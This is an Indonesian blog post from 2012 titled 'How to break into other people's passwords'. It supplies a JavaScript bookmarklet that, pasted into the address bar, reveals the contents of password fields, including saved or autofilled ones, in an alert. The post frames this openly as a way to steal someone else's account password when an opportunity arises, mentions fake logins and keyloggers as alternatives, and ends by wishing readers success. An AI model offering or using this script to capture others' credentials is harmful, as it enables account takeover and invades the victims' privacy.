English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic Chinese Simplified

Selasa, 09 Oktober 2012

Cara Bobol Password Orang


Buat kalian yang lagi pengen bobol pasword orang (akun apa aja) dengan mudah, saya punya caranya, mudah dan sangat simple sekali. Sebenarnya banyak sekali cara untuk membobol akun orang lain, ada yang pake fakelogin, keylogger, dan masih banyak lain. Walaupun banyak cara untuk mendapatkan password orang lain tapi tidak semudah begitu saja apalagi kalau kita berhadapan orang yang ingin kita curi passwordnya, dia sudah berpengalaman di dunia internet ini.

Cara yang akan saya bagikan adalah cara yang paling simple tapi susah untuk mencari kesempatannya, bagaimana caranya? sangat mudah sekali sob, tinggal copy kan script di bawah ini kedalam adress bar pada website yang menggunakan Password dalam bentuk asterix (kaya kita nulis password di facebook).

nih kode script nya saya sediakan.


javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22n%22; } } if (s) alert(%22Passwords in forms on this page:nn%22 + s); else alert(%22There are no saved passwords in forms on this page.%22);})();


selamat mencoba semoga berhasil............

0 komentar:

Posting Komentar